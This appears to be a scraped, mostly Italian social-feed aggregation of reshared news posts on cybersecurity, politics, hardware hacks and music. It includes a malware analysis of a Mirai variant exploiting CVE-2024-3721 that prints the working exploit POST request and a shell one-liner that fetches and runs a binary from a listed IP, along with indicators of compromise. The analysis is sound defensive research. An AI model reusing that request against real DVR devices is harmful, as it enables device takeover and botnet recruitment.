Cybersecurity, ministri Ue adottano piano comune per gestire attacchi cyber
@Informatica (Italy e non Italy 😁)
I ministri delle Comunicazioni dell’Unione europea hanno adottato l’Eu Cyber Blueprint, un nuovo piano per la gestione delle crisi informatiche che fornisce indicazioni per una risposta coordinata a incidenti e attacchi informatici su larga scala, chiarendo ruoli e
Informatica (Italy e non Italy 😁) reshared this.
Italia-Cina, caso di spionaggio per gli Yacht Ferretti
@Informatica (Italy e non Italy 😁)
Milano centro, inizio Aprile 2024, via Manzoni. Dall’androne di un palazzo elegante un uomo guadagna veloce l’uscita. Si chiama Xu Xinyu ed è uno dei top manager della Ferretti, società quotata a Milano e Hong Kong, che proprio qui ha i suoi uffici meneghini. Xu è spaventato. Dall’altro lato della strada
reshared this
FreeDrain: nuova frontiera del phishing per il furto crypto industriale
@Informatica (Italy e non Italy 😁)
Non più piccoli gruppi isolati, ma una vera e propria “fabbrica” globale di phishing. Scopriamo come opera FreeDrain e quali sono le sue tecniche di attacco per adottare gli strumenti utili a mitigare eventuali danni
L'articolo FreeDrain: nuova frontiera del phishing
Informatica (Italy e non Italy 😁) reshared this.
Tecnologie, uomini e silenzio. Il caso Graphite letto da Volpi
@Notizie dall'Italia e dal mondo
Ci sono dinamiche che sfuggono alla superficie. Accadono nel sottobosco del potere, nelle aree grigie dove la legge incontra la responsabilità, dove la sicurezza dello Stato non è una formula, ma un equilibrio fragile, costantemente rimesso in discussione. In quei territori – riservati più che segreti – non esistono automatismi. Ogni
Notizie dall'Italia e dal mondo reshared this.
che poi è la cosa sostenuta da molti ma può essere ignorata perché molti riescono a pensare il contrario. fino a quando sarà possibile.
Trump e Musk possono farsi molto male
Andare oltre il litigio online potrebbe finire per coinvolgere Tesla, i contratti a SpaceX ma anche la legge sul budget in discussione al SenatoIl Post
A Cuba la nuova crisi riguarda i costi di internet
L'azienda monopolista ha alzato enormemente i prezzi e imposto un pagamento in dollari: è un grosso problema per tantissime personeIl Post
Acerbo (Prc): domani a Roma con comunità palestinese e Stop Rearm Europe
Domani parteciperemo alla manifestazione per Gaza indetta da PD, Avs e M5S. La seppur assai tardiva convocazione è un fatto politico assai positivo. BisoRifondazione Comunista
In Film, What’s Old May Still Be New Again
We recently published an affectionate look at a Polaroid Land camera, whose peel-apart instant film is long out of production except for a very few single exposure packs form a boutique manufacturer. All that was left was a discussion of modifying it for conventional roll film, or perhaps hacking a modern back-to-front Polaroid sheet into it.
Never say never though, because along come the Chinese company Light Lens Lab with a short announcement at the end of a post talking about grain structures and anti-halation layer materials for their black and white film.
Lastly, with our future development plan, we are currently developing and researching instant peel-apart film, with plans on producing and making available black and white peel-apart film by 2025 in various format. We aim to have an update on our packaging and test shot for the next development/research progress installment. We are also researching, developing and producing colour reversal films that consist of a dye-incorporating development process, commonly known as K-14, for 135 and 120 formats in 2026.
So there you go, no sooner has Hackaday declared a format unavailable, than it shows every sign of reappearing. At this point we’d like to take the opportunity to report that McDonalds Szechuan Chicken McNugget sauce will never ever be available again.
So what does this mean? First of all, assuming that the stuff doesn’t need the GDP of a small country to buy in Europe, the Hackaday Polaroid 104 will be able to shoot in its native format again. But perhaps more interestingly, it opens up a new option for the camera hacker. Pack film is much easier than modern instant film to deal with; it requires only rollers and someone to tug on that paper tab, no gears or motors involved. We’re here for this.
The observant will also have noted at the end of the announcement, mention of a dye-incorporating development process. This refers to the colour chemistry seen in Kodachrome, a long-extinct single-layer film that offered legendarily sharp and vibrant-coloured pictures at the expense of a very complex development path. We’d love to see it, but we’ll take the instant pack film and run.
The Hackaday Land camera is here.
Humans are killing helpful insects in hundreds of ways − simple steps can reduce the harm
Insects are often under pressure from several threats at once, from pesticides to habitat loss to pollution.The Conversation
Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721
The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.
We recently observed the use of CVE-2024-3721 in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous Mirai botnet, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, widely used by many manufacturers and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.
Exploitation
During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to a CVE-2024-3721. This vulnerability allows for the execution of system commands on TBK DVR devices without proper authorization as an entry point, using a specific POST request:
"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"
The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.
cd /tmp; rm arm7; wget 42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.
Malware implant – Mirai variant
The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.
The DVR bot is also based on the Mirai source code but it includes different features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai in many posts, so we’ll focus on the new features of this specific variant.
Data decryption
The data decryption routine in this variant is implemented as a simple RC4 algorithm.
The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: 6e7976666525a97639777d2d7f303177
.
The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom DataDecrypted
structure, which is a simple string list:
The global linked list with decrypted data is accessed whenever the malware needs particular strings.
Adding decrypted strings to the global list
Anti-VM and anti-emulation
To detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the /proc
directory, which is the proc filesystem on Linux.
Each process ID (PID) has its own folder containing useful information, such as cmdline
, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with VMware
or QEMU-arm
in their command line.
The implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:
Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.
Infection statistics
According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.
Conclusion
Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.
The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.
All Kaspersky products detect the threat as HEUR:Backdoor.Linux.Mirai
and HEUR:Backdoor.Linux.Gafgyt
.
Indicators of compromise
Host-based (MD5 hashes)
011a406e89e603e93640b10325ebbdc8
24fd043f9175680d0c061b28a2801dfc
29b83f0aae7ed38d27ea37d26f3c9117
2e9920b21df472b4dd1e8db4863720bf
3120a5920f8ff70ec6c5a45d7bf2acc8
3c2f6175894bee698c61c6ce76ff9674
45a41ce9f4d8bb2592e8450a1de95dcc
524a57c8c595d9d4cd364612fe2f057c
74dee23eaa98e2e8a7fc355f06a11d97
761909a234ee4f1d856267abe30a3935
7eb3d72fa7d730d3dbca4df34fe26274
8a3e1176cb160fb42357fa3f46f0cbde
8d92e79b7940f0ac5b01bbb77737ca6c
95eaa3fa47a609ceefa24e8c7787bd99
96ee8cc2edc8227a640cef77d4a24e83
aaf34c27edfc3531cf1cf2f2e9a9c45b
ba32f4eef7de6bae9507a63bde1a43aa
IPs
116.203.104[.]203
130.61.64[.]122
161.97.219[.]84
130.61.69[.]123
185.84.81[.]194
54.36.111[.]116
192.3.165[.]37
162.243.19[.]47
63.231.92[.]27
80.152.203[.]134
42.112.26[.]36
Soviet Calculator Teardown Reveals Similarities And Differences
Tearing down hardware from different parts of the world can be revealing, showing unique parts, techniques, and tricks employed by engineers living in a very different world from our own. To that end, [msylvain59] has been kind enough to give us a look inside the Elektronika MK-26—a calculator built in the former Soviet Union.
There’s lots of interesting stuff to see from the get-go. The oddball button pad is covered in Cyrillic symbols, quite alien to those of us more accustomed to the Latin character set. It’s also constructed somewhat unlike more familiar models from Western-aligned companies like Casio or Commodore. It also rattles when shaken, which doesn’t inspire confidence. Inside, it’s got old-school brown PCBs without the usual green solder mask, a chunky IC in a weird package, and display is via a power-hungry VFD.
It doesn’t look so totally alien inside; much of the construction is pretty typical of the mid-1970s, wherever you went around the world. The most striking differences are more in the graphics and visual design than anything else.
Ultimately, there are reasons why manufacturers around the world tend to converge on similar techniques. Generally, it’s because it’s more economical or easier to do things a certain way. And yet, we still see regional variances because conditions, technologies, and parts availability varies around the world. This teardown highlights that quite clearly.
If you’re just getting a taste for Soviet hardware teardowns, you’ll love this video diving inside a real Soyuz clock.
youtube.com/embed/N2kkGV5aBs8?…
Lavori in un Call Center? Inizia ad avere paura per il tuo lavoro!
ElevenLabs, nota per le sue soluzioni all’avanguardia di sintesi vocale ed effetti sonori basati sull’intelligenza artificiale, ha annunciato un importante aggiornamento della sua piattaforma: Conversational AI 2.0. Sviluppata da ex ingegneri di Palantir, la nuova versione rappresenta un ulteriore passo avanti nella creazione di agenti vocali più naturali e intelligenti per le aziende, dall’assistenza clienti all’automazione di vendite e marketing.
La seconda versione dell’IA conversazionale è ora in grado di gestire le sfumature che distinguono il dialogo dal vivo dai servizi vocali robotici.
Grazie al nuovo sistema, l’agente impara a rispondere alle pause, alle caratteristiche di intonazione e a non interrompere l’interlocutore, nonché a utilizzare correttamente pause e riempitivi, eliminando completamente la sensazione di comunicazione meccanica. Questa funzione è particolarmente richiesta nei servizi di supporto e nei call center, dove la velocità di risposta è fondamentale senza compromettere il comfort del cliente.
Un’importante innovazione è l’identificazione automatica della lingua: ora l’agente stesso determina la lingua dell’utente e la cambia istantaneamente, senza bisogno di configurare manualmente le impostazioni. Questa funzione sta già diventando uno standard per le aziende globali che lavorano con un pubblico multilingue e contribuisce ad abbattere le barriere linguistiche per i clienti.
Il nuovo sistema include anche la tecnologia RAG (Retrieval-Augmented Generation), che consente di recuperare informazioni al volo da basi di conoscenza esterne. Ad esempio, un assistente vocale medico potrà accedere istantaneamente alle linee guida aggiornate e un servizio di supporto potrà accedere alla documentazione interna dei prodotti. Tutto ciò viene implementato con ritardi minimi e maggiori garanzie di privacy, un aspetto fondamentale per settori regolamentati come quello medico.
Uno degli aspetti chiave della piattaforma è il supporto multimodale. Ora l’agente può interagire non solo tramite voce, ma anche tramite testo, e combinare entrambi i canali senza la necessità di creare versioni diverse per ciascuna piattaforma. Inoltre, è stata introdotta la modalità “Multi-Character“: l’assistente vocale può cambiare ruolo e stile di comunicazione, imitando immagini diverse, aprendo nuove opportunità per la creatività, i programmi educativi e gli scenari di formazione.
Per le aziende che operano nel settore delle comunicazioni di massa, è stata implementata una funzione di chiamata in uscita in batch: ora la piattaforma consente di avviare automaticamente chiamate parallele, utile per condurre sondaggi, inviare notifiche o messaggi personalizzati. Questo aumenta significativamente la portata del pubblico e riduce il carico di lavoro degli operatori.
Gli sviluppatori di ElevenLabs hanno prestato particolare attenzione ai requisiti di sicurezza e alla conformità agli standard: la nuova piattaforma soddisfa i requisiti HIPAA per i dati medici e supporta l’archiviazione opzionale delle informazioni nell’UE, un aspetto importante per i clienti aziendali soggetti a rigide restrizioni normative. Il sistema è progettato per garantire un’elevata disponibilità, si integra facilmente con servizi esterni ed è adatto all’utilizzo in infrastrutture critiche.
La piattaforma è disponibile a diverse tariffe, da un piano gratuito con un set base di minuti e un limite di connessioni simultanee, a un piano business con un pacchetto di servizi esteso e supporto per migliaia di minuti al mese. Questo approccio rende il prodotto accessibile sia alle startup che alle grandi aziende.
Il rilascio di Conversational AI 2.0 segna una nuova pietra miliare nello sviluppo delle tecnologie vocali per le aziende: ElevenLabs punta sulla massima naturalezza, adattabilità e scalabilità delle sue soluzioni, sottolineando che l’era degli interlocutori digitali realistici è appena iniziata.
L'articolo Lavori in un Call Center? Inizia ad avere paura per il tuo lavoro! proviene da il blog della sicurezza informatica.
PPI Fundraiser for IGF
Dear Friends of the Pirate Community,
PPI is heading again to the Internet Governance Forum (IGF), this time in Norway. The IGF is a UN event that brings together a large number of governments and non-profit organizations. PPI has attended the IGF for about 10 years now. As part of our effort to attend the event, we are conducting a fundraiser to collect up to 1500 euros to support our representatives. Donations can be made directly on our website or through the following crowdfunding campaign: fundrazr.com/b2Yiz8
PPI was accepted to organize a workshop entitled “Ethical Networking: Sustainability and Accountability” will be on June 23rd at 16:15 in Workshop Room 2, Hall C: intgovforum.org/en/content/igf…
We will also be presenting at a booth with the European Pirate Party.
We are attempting to fundraise some of the costs of our representatives who will be paying out of their own pocket to attend the event. Being in Norway this year, means that it will not be cheap. Any financial assistance would be greatly appreciated.
As a way to further motivate fundraising, we have also provided an incentive to include individual membership in PPI, which normally costs 10 euros, for those who provide at least a 15 euro donation.
The entire event is from June 23rd to 27th. Please review the IGF website as the date nears for information about participating online: intgovforum.org/en/content/igf…
All approved events can be seen here: intgovforum.org/en/content/igf…
Last year in Saudi Arabia we also organized a workshop on Autarchy, spearheaded by Alexander Isavnin: intgovforum.org/en/content/igf…
Two years ago we had a booth in Japan: pp-international.net/2023/10/i…
The year before that PPI had a booth in Poland: pp-international.net/2021/12/p…
At the moment PPI does not have any extra funding for this event. Every PPI representative is self-funded. By making a donation you will provide partial assistance for one of our representatives to attend.
L’UE lancia la nuova strategia globale per il digitale e pone al centro cooperazione, sicurezza e valori
L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
Mercoledì 5 giugno, la Commissione europea e l’Alto rappresentante per gli Affari esteri e la politica di sicurezza
Intelligenza Artificiale reshared this.
PODCAST. La Cina paciera del sud globale
@Notizie dall'Italia e dal mondo
Istituita a Hong Kong l'Organizzazione internazionale per la mediazione, un altro tassello del soft power cinese per unire il sud del mondo contro il protezionismo di Trump.
L'articolo PODCAST. La Cina paciera del sud globale proviene da Pagine pagineesteri.it/2025/06/06/ori…
Notizie dall'Italia e dal mondo reshared this.
Deepfake: cosa sono e come riconoscerli per smascherare la disinformazione
@Informatica (Italy e non Italy 😁)
I deepfake sono video (e non solo) falsi generati dall'intelligenza artificiale che stanno diventando sempre più diffusi e convincenti. Un problema, quello della disinformazione, tanto rilevante da spingere autorità e istituzioni a normare il settore,
Informatica (Italy e non Italy 😁) reshared this.
Trump e Musk ai ferri corti: fine dell’idillio tra miliardari
@Notizie dall'Italia e dal mondo
Dall’alleanza di potere alla guerra aperta: il taglio ai sussidi per le auto elettriche scatena lo scontro tra l’ex presidente e il patron di Tesla.
L'articolo Trump e Musk ai ferri corti: pagineesteri.it/2025/06/06/mon…
Notizie dall'Italia e dal mondo reshared this.
freezonemagazine.com/articoli/…
Joan Osborne prosegue il suo appassionato pellegrinaggio nel canzoniere di Bob Dylan con Dylanology Live, un disco che cattura un concerto di rara intensità emotiva e musicale. Dopo l’ottimo riscontro del progetto in studio Songs of Bob Dylan del 2017, l’artista americana torna sul palco per reinterpretare dal vivo alcuni classici – e qualche perla […]
L'articolo Joan Osborne – Dylanology Live
Investimenti cyber e benefici del GDPR: un’economia che fa bene alle aziende
@Informatica (Italy e non Italy 😁)
L’Autorità francese della protezione dati ha reso noto un’analisi sull’impatto economico del GDPR in materia di cyber security: è emerso che, grazie agli obblighi di sicurezza imposti dal regolamento UE, sono stati impediti, ad esempio, casi di furto di
Informatica (Italy e non Italy 😁) reshared this.
Dal riscatto alla gestione preventiva del rischio: l’evoluzione normativa nella lotta ai ransomware
@Informatica (Italy e non Italy 😁)
La normativa si adegua per tenere il passo con l'evoluzione dei ransomware vietando il pagamento dei riscatti. Tra inasprimento sanzionatorio e mitigazione del rischio, ecco quale potrebbe essere la soluzione più efficace
L'articolo Dal riscatto alla gestione
Informatica (Italy e non Italy 😁) reshared this.
Una tangenziale per isolare Gerusalemme dai palestinesi
@Notizie dall'Italia e dal mondo
Anche attraverso la rete stradale, Israele porta avanti la «politica del bantustan», ossia di un sistema di enclavi palestinesi collegate da corridoi, ma prive di qualsiasi sovranità
pagineesteri.it/2025/06/06/med…
Notizie dall'Italia e dal mondo reshared this.
Torselli (FdI) a TPI: “In Italia è sotto attacco il diritto ad astenersi ai referendum”
@Politica interna, europea e internazionale
Onorevole Torselli, domenica e lunedì sono in programma i referendum su lavoro e cittadinanza. La premier Meloni ha detto che andrà al seggio ma non ritirerà la scheda. Qual è il senso di questa scelta? “È una risposta a chi, strumentalmente, vuole tentare di
Politica interna, europea e internazionale reshared this.
freezonemagazine.com/news/neal…
Neal Casal è stato un venerato cantautore i cui dieci album da solista sono ampiamente considerati dei classici nel canone della musica roots e americana. È stato anche un celebre chitarrista e collaboratore che si è trovato a suonare al fianco di artisti che vanno da Willie Nelson a Shooter Jennings, dai Jayhawks a Phil […]
L'articolo Neal Casal –
C’è un buco nel cloud OneDrive di Microsoft?
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Secondo alcuni esperti uno dei servizi di cloud storage più popolari sul mercato, OneDrive di Microsoft, lascerebbe la porta socchiusa ai malintenzionati, con il rischio di fughe di dati, lesione del diritto alla privacy e violazione delle
like this
reshared this
GhostSec: Azienda Italiana Commissiona Attacco Informatico Al Governo Macedone
GhostSec, noto collettivo di hacktivisti, ha recentemente rivelato dettagli su un’operazione controversa che coinvolge un’azienda italiana e obiettivi governativi macedoni.
In un’intervista esclusiva con DeepDarkCTI, il fondatore Sebastian Dante Alexander ha condiviso informazioni su questa collaborazione e le sue implicazioni.
Una collaborazione controversa
Secondo quanto riportato, un’azienda italiana, ufficialmente privata ma presumibilmente legata ai servizi segreti italiani, avrebbe incaricato GhostSec di condurre operazioni offensive contro obiettivi governativi in Macedonia del Nord. Successivamente, la stessa azienda avrebbe richiesto attacchi contro un’entità in Sardegna, indicata come una società rivale.
La comunicazione tra le parti è avvenuta tramite canali criptati, con l’azienda italiana che ha contattato direttamente GhostSec. Tuttavia, dopo l’esecuzione delle operazioni, l’azienda avrebbe interrotto i contatti e non avrebbe effettuato il pagamento concordato.
La risposta di GhostSec
In risposta al mancato pagamento, GhostSec ha minacciato di rendere pubbliche le comunicazioni e i dettagli delle operazioni svolte. Alexander ha dichiarato che l’esposizione delle informazioni non solo metterebbe in imbarazzo l’azienda italiana, ma potrebbe anche avere ripercussioni sul governo macedone.
Nonostante le implicazioni legali, GhostSec sembra determinato a procedere con la divulgazione, a meno che non venga raggiunto un accordo con l’azienda coinvolta.
Implicazioni e riflessioni
Questo caso solleva interrogativi significativi sull’etica delle operazioni di hacktivismo e sulle collaborazioni tra entità private e gruppi di hacker. La facilità con cui un’azienda può commissionare attacchi informatici contro governi stranieri evidenzia quanto può essere difficile una regolamentazione più stringente nel cyberspazio dove è possibile raggiungere un’alta forma di anonimato.
Per ulteriori dettagli sull’intervista e le dichiarazioni complete di Sebastian Dante Alexander, è possibile consultare l’articolo originale su DeepDarkCTI.
Chi è GhostSec
GhostSec è un collettivo di hacker emerso nel 2015 come diramazione del movimento Anonymous, guadagnando notorietà per le sue operazioni contro l’ISIS nell’ambito della campagna #OpISIS. Inizialmente motivato da ideali di giustizia sociale e lotta al terrorismo, il gruppo ha subito una trasformazione significativa nel corso degli anni.
Una frattura interna ha portato alla formazione di due entità distinte: da un lato, il “Ghost Security Group“, che ha scelto di collaborare con agenzie governative per contrastare il terrorismo; dall’altro, i membri rimasti sotto il nome di GhostSec, che hanno progressivamente orientato le loro attività verso obiettivi finanziari. Questo cambiamento è evidenziato dal lancio di “GhostSec Mafia Premium”, un canale Telegram a pagamento che offre contenuti esclusivi come fughe di dati e tutorial di hacking. La frase “Hacktivism does not pay the bills!” (L’hacktivismo non paga le bollette) sintetizza questa nuova direzione.
Nel 2023, GhostSec ha introdotto GhostLocker, una piattaforma di Ransomware-as-a-Service (RaaS) che consente agli affiliati di lanciare attacchi ransomware condividendo i profitti con il gruppo. La versione più recente, GhostLocker 2.0, scritta in Go, offre funzionalità avanzate come crittografia AES a 128 bit, opzioni di persistenza e un pannello di controllo per gli affiliati. In collaborazione con il gruppo Stormous, GhostSec ha lanciato il programma STMX_GhostLocker, ampliando ulteriormente la portata delle sue operazioni.
Nonostante una dichiarazione nel maggio 2024 in cui affermava di voler cessare le attività criminali e tornare all’hacktivismo, le azioni recenti del gruppo suggeriscono una continua evoluzione verso il cybercrime organizzato. GhostSec è attualmente associato a collettivi come ThreatSec, Stormous, BlackForums e SiegedSec, formando una rete nota come “The Five Families”.
Conclusioni
Il caso GhostSec–azienda italiana rappresenta un inquietante esempio di come i confini tra attivismo, intelligence privata e criminalità informatica siano oggi sempre più sfumati. Un gruppo nato con finalità ideologiche si ritrova al centro di un presunto contratto per operazioni offensive contro obiettivi governativi stranieri — un contesto che richiama più un’operazione sotto false flag che una campagna di hacktivismo tradizionale.
Tuttavia, l’assenza di prove concrete, l’anonimato delle parti coinvolte e la mancanza di verifica indipendente impongono massima cautela: non è ancora possibile stabilire con certezza quanto ci sia di vero nel racconto fornito da GhostSec. Ciò non toglie che simili dichiarazioni, anche solo a livello di minaccia, abbiano un impatto significativo: mettono in allerta istituzioni, aziende e opinione pubblica sulla crescente professionalizzazione del crimine informatico e sull’emergere di una nuova zona grigia dove hacker, contractor e interessi geopolitici si intrecciano.
In questo scenario, la Cyber Threat Intelligence (CTI) diventa uno strumento cruciale: monitorare, analizzare e anticipare questi fenomeni consente non solo di prevenire attacchi informatici, ma anche di identificare tempestivamente le reti opache di collaborazione tra attori privati e cybercriminali. Solo attraverso un’attività costante di intelligence è possibile neutralizzare le minacce prima che si traducano in danni concreti.
Resta da vedere se GhostSec pubblicherà davvero le prove promesse, se emergerà l’identità dell’azienda coinvolta o se l’intera vicenda svanirà nell’ombra, come molte altre nel dark web. In ogni caso, questo episodio è un campanello d’allarme che non può essere ignorato.
L'articolo GhostSec: Azienda Italiana Commissiona Attacco Informatico Al Governo Macedone proviene da il blog della sicurezza informatica.
Mattina 06/06/2025
Mi pongo domande sulla vita e sulla morte
Non riconosco il tempo e non comprendo i suoi consigli
Mentre Elbereth mi guarda silenziosa
SPACEdeck is Half Cyberdeck, Half Phone Case, All Style
It’s been at least a few hours since Hackaday last featured a cyberdeck, so to avoid the specter of withdrawal, we present you with [Sp4m]’s SPACEdeck, a stylish phone-based cyberdeck!
The SPACEdeck takes a Samsung Galaxy S24 and puts it into a handsome clamshell case with a wireless keyboard, turning the phone into a tiny-screened laptop that urges you not to panic. Is The Hitchiker’s Guide to The Galaxy available on the Playstore? Well, the e-book of the novel surely is, and having access to Wikipedia comes close. The design is building off (or out from, as the case may be) a 3D-printed phone case for the S24 by Digital Proto.
Given that the Galaxy S24 has more horsepower than the ancient Macbook we’re writing this on, this setup is probably going to be more useful than you might think, especially when paired with Termux to give you the full power of Linux.
Like some modern laptops, the screen can rotate 180 degrees for when the keyboard isn’t needed. The case will also allow for Nintendo Switch2 joycon integration, but that’s a work in progress for now. The connection points will also be modular so other accessories can be used. All files will be released once [Sp4m] is happy with how the Joycons are holding on, hopefully with a license that will allow us to remix this for other phones.
Given the supercomputers in our pockets, it’s really a wonder we don’t see more android-based cyberdecks, but most seem to stick to SBCs. Lately it seems the slabtop form-factor has been equally popular for cyberdecks, but it’s hard to beat a clamshell for practicality.
Fan di Star Wars o spie della CIA? Ecco cosa ha scoperto un ricercatore brasiliano
404 Media e il ricercatore indipendente Ciro Santilli hanno scoperto dei siti web insoliti creati e gestiti dalla CIA. Per comunicare con gli informatori sono stati utilizzati un sito di fan di Star Wars, un sito sugli sport estremi e un sito sulla musica brasiliana.
Santilli ha affermato di essere stato attratto dallo studio della rete della Central Intelligence Agency (CIA) per una serie di ragioni, tra cui il suo interesse per la politica cinese, il suo amore per gli adattamenti televisivi dei romanzi di spionaggio e “il desiderio di vendicarsi della CIA per aver spiato altri paesi democratici” (Santilli è brasiliano). Inoltre, il ricercatore riteneva di essere qualificato per condurre tale ricerca, data la sua esperienza nello sviluppo web e in Linux. Scherza anche dicendo che, ovviamente, lui voleva “fama e fortuna”.
Uno dei siti creati dalla CIA era starwarsweb.net, un falso sito di fan di Star Wars. A prima vista, la risorsa sembra un tipico sito web degli anni 2010: pubblicizzava un set Lego Star Wars per coloro che “vogliono diventare uno Jedi”, così come giochi che potrebbero piacere ai visitatori: Star Wars Battlefront 2 per Xbox; Star Wars: Il potere della Forza II per Xbox 360 e Star Wars the Clone Wars: Republic Heroes per Nintendo Wii.
Secondo Santilli, il sito era in realtà uno strumento della CIA per comunicare segretamente con i suoi informatori in altri Paesi. Inoltre, il sito faceva parte di una vasta rete di risorse simili, individuate dalle autorità iraniane più di dieci anni fa.
Il ricercatore ha trovato anche altri siti probabilmente collegati alla CIA. Tra questi ci sono siti dedicati agli sport estremi, alla musica brasiliana e un sito di fan di un famoso comico. Alcune di queste risorse, in base alla lingua e al contenuto, erano orientate verso Germania, Francia, Spagna e Brasile.
“Questo ci ha permesso di scoprire molti più siti e di acquisire una comprensione più ampia degli interessi della CIA , inclusi specifici paesi democratici che erano considerati obiettivi e non erano stati menzionati in precedenza. Fornisce anche un’idea statistica di quanta importanza attribuissero alle diverse aree all’epoca, e non sorprende che il Medio Oriente fosse in cima alla lista”, afferma Santilli.
I giornalisti di 404 Media ricordano che nel novembre 2018 Yahoo News pubblicò un’indagine su larga scala sui canali di comunicazione segreti della CIA e su come furono svelati. Poi la rivelazione avvenne in Iran, dopo la quale più di due dozzine di fonti della CIA morirono in Cina nel 2011 e nel 2012. Alla fine, la CIA fu costretta a smettere di usare questi strumenti di comunicazione segreti.
Nel settembre 2022, la Reuters ha pubblicato la propria inchiesta dal titolo “Spie americane abbandonate“. Questo articolo, ad esempio, descrive come un informatore della CIA in Iran, di nome Gholamreza Hosseini, sia stato smascherato dalle autorità iraniane a causa dei siti web segreti poco affidabili della CIA.
In particolare, uno degli errori della CIA è stato quello di aver inserito indirizzi IP sequenziali che puntavano ai siti: questo significa che, scoprendone uno, i ricercatori avrebbero potuto facilmente scoprire anche gli altri.
L’articolo della Reuters riportava che digitare una password nella barra di ricerca di siti web apparentemente normali in realtà attivava un processo di accesso, consentendo alle fonti di comunicare con la CIA. L’articolo menzionava due domini e descriveva nove siti. Utilizzando i dati di questo articolo, Santilli è riuscito a trovare molte risorse simili.
L'articolo Fan di Star Wars o spie della CIA? Ecco cosa ha scoperto un ricercatore brasiliano proviene da il blog della sicurezza informatica.
Tassoman reshared this.
Phishing Invisibile in Microsoft Outlook: La Trappola Perfetta Elude Anche i Sistemi di Sicurezza!
Sans Tech segnala una sofisticata tecnica di phishing che sfrutta le capacità di rendering HTML di Microsoft Outlook per nascondere link dannosi ai sistemi di sicurezza aziendali, mantenendone l’efficacia contro gli utenti finali.
L’attacco sfrutta istruzioni HTML condizionali per visualizzare contenuti diversi a seconda che l’e-mail venga visualizzata in Outlook o in client di posta elettronica alternativi, consentendo agli autori della minaccia di aggirare i meccanismi di scansione di sicurezza comunemente implementati negli ambienti aziendali.
Gli analisti della sicurezza hanno osservato che questa tecnica viene utilizzata principalmente contro gli istituti finanziari, con gli aggressori che creano e-mail che sembrano provenire da importanti banche e richiedono la verifica del conto.
La natura sofisticata di questi attacchi suggerisce che siano opera di esperti in minacce informatiche che conoscono le sfumature tecniche dei motori di rendering dei client di posta elettronica e delle architetture di sicurezza aziendale.
Queste istruzioni, e , sono state originariamente create per garantire la corretta formattazione delle e-mail su diversi client, ma ora sono state utilizzate come armi dai criminali informatici. Quando un’e-mail contenente queste istruzioni condizionali viene aperta in Microsoft Outlook, viene eseguito il codice condizionale MSO (Microsoft Office), che visualizza contenuto innocuo che appare legittimo sia agli utenti sia ai sistemi di sicurezza automatizzati.
La tecnica funziona creando due percorsi di codice distinti all’interno di un singolo messaggio di posta elettronica. Il primo percorso indirizza gli utenti di Outlook con link apparentemente legittimi, mentre il secondo indirizza gli utenti di altri client di posta elettronica a siti web di raccolta di credenziali.
Questo approccio a doppia funzionalità consente agli aggressori di mantenere un’apparenza di legittimità quando le e-mail vengono elaborate dall’infrastruttura di sicurezza aziendale, che si basa prevalentemente su meccanismi di scansione basati su Outlook.
L’implementazione dannosa prevede l’incorporamento di blocchi HTML condizionali che eseguono diverse destinazioni di collegamento ipertestuale in base all’identificazione del client di posta elettronica. La struttura del codice segue questo schema:
Questa struttura del codice garantisce che gli utenti di Outlook vedano riferimenti a domini bancari legittimi, mentre gli utenti di Apple Mail, Thunderbird, dell’interfaccia web di Gmail e di altri client non Outlook vengono reindirizzati a infrastrutture controllate dagli aggressori.
La scoperta di questa tecnica evidenzia significative debolezze nelle architetture di sicurezza della posta elettronica aziendale La maggior parte delle soluzioni di sicurezza aziendale analizzano le e-mail utilizzando motori compatibili con Outlook, il che significa che elaborano solo il ramo condizionale benigno e non riescono a rilevare il percorso alternativo dannoso.
L'articolo Phishing Invisibile in Microsoft Outlook: La Trappola Perfetta Elude Anche i Sistemi di Sicurezza! proviene da il blog della sicurezza informatica.
A Flashlight of Fire and Ice
